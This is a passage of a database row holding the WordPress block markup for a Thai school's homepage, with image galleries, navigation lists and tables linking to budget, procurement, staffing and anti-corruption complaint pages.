(1607,1,'2025-07-02 10:55:06','2025-07-02 03:55:06','<!-- wp:kadence/rowlayout {\"uniqueID\":\"14_e96e1d-10\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"14_cddd30-7b\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column14_cddd30-7b\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"67990d4f\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e53f332c\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingBottom\":\"10px\"}} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"14_8eda8b-3a\",\"columns\":[1,1,1,1,1,1],\"thumbSize\":\"full\",\"ids\":[666,668],\"type\":\"carousel\",\"imageRatio\":\"land169\",\"autoPlay\":true,\"transSpeed\":1000,\"slidesScroll\":\"all\",\"arrowStyle\":\"none\",\"dotStyle\":\"light\",\"imagesDynamic\":[{\"id\":666,\"link\":\"http://pakhaeng.ssk.in.th/?attachment_id=666\",\"alt\":\"\",\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก2-1.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก2-1.png\",\"lightUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก2-1.png\",\"width\":1600,\"height\":900},{\"id\":668,\"link\":\"http://pakhaeng.ssk.in.th/?attachment_id=668\",\"alt\":\"\",\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก3.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก3.png\",\"lightUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก3.png\",\"width\":1600,\"height\":900}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"ff644ddb\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"14_386744-46\",\"columns\":[4,4,4,3,2,2],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=1523\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=484\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=476\",\"linkTarget\":\"_blank\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=563\",\"linkTarget\":\"_blank\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":30,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/ผอ-1.png\" alt=\"\" title=\"ผอ 1\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"14_3c234c-51\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns14_3c234c-51\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"14_bead82-d8\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\",\"link\":\"http://pakhaeng.ssk.in.th/?page_id=469\",\"sizePreset\":\"small\",\"background\":\"#0a71ad\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#0a71ad\",\"backgroundColorHover\":\"#8ed1fc\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"14_941599-c9\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items14_941599-c9 kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"14_67d38e-c6\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_67d38e-c6\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=650\" data-type=\"page\" data-id=\"650\">ข้อมูลพื้นฐาน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_4b01f7-65\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_4b01f7-65\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=643\">ประวัติโรงเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_61e97e-78\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_61e97e-78\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=609\" data-type=\"page\" data-id=\"609\">ข้อมูลสิ่งก่อสร้าง</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_0f2844-d8\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_0f2844-d8\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=656\" data-type=\"page\" data-id=\"656\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_cba4c7-2c\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_cba4c7-2c\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">กรรมการสถานศึกษา</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_bf6039-24\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_bf6039-24\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=469\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_d4f0fe-83\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_d4f0fe-83\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=605\" data-type=\"page\" data-id=\"605\">ข้อมูลบุคลากร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_f5c57d-b9\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_f5c57d-b9\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=496\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=496\">ข้อมูลนักเรียน</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e5e0c341\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":503,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\"} -->\n<figure class=\"wp-block-image size-full\"><a href=\"http://eita.ssk.in.th/eit_admin.php\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/Is-It-a-Gift-Instagram-Post.png\" alt=\"\" class=\"wp-image-503\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1314,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\"} -->\n<figure class=\"wp-block-image size-full\"><a href=\"http://eita.ssk.in.th/eit.php\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/1.png\" alt=\"\" class=\"wp-image-1314\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1315,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\"} -->\n<figure class=\"wp-block-image size-full\"><a href=\"http://eita.ssk.in.th/eit_admin.php\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/2.png\" alt=\"\" class=\"wp-image-1315\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"54d1190a\",\"isDynamic\":true,\"blockVersion\":4} /-->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"9l7bo6vn\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"showTaxonomy\":false,\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"showPagination\":true,\"postsPerPage\":\"2\",\"headingText\":\"วิดีโอกิจกรรมโรงเรียน\",\"headingStyle\":\"heading5\",\"headingHide\":false,\"category-terms\":[{\"label\":\"วิดีโอกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%a7%e0%b8%b4%e0%b8%94%e0%b8%b5%e0%b9%82%e0%b8%ad%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}],\"headingBgColor\":\"#ff6900\"} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=546\">โครงสร้างและอำนาจหน้าที่</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=469\">ข้อมูลผู้บริหาร</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=362\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=362\">ข้อมูลการติดต่อ</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=355\" data-type=\"page\" data-id=\"355\">ข่าวประชาสัมพันธ์</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและการใช้จ่ายงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td>แผนกลยุทธ์หรือแผนพัฒนาคุณภาพการศึกษาของสถานศึกษา</td></tr><tr><td>แผนปฏิบัติการและความก้าวหน้าในการดำเนินงานและการใช้งบประมาณประจำปี</td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=784\">คู่มือหรือแนวทางปฏิบัติงานของครู และบุคลากรทางการศึกษา</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=459\">E-Service</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=1540\">รายการการจัดซื้อจัดจ้างหรือการจัดหาพัสดุและความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ ประจำปีงบประมาณ พ.ศ .2568</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=1571\">รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี งบประมาณ พ.ศ .2567</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=566\" data-type=\"page\" data-id=\"566\">แผนการบริหารและพัฒนาทรัพยากรบุคคล</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=1003\" data-type=\"page\" data-id=\"1003\"></a><a href=\"http://pakhaeng.ssk.in.th/?page_id=900\" data-type=\"page\" data-id=\"1003\">ประมวลจริยธรรม และการขับเคลื่อนจริยธรรม</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=712\" data-type=\"page\" data-id=\"712\">แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=476\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e 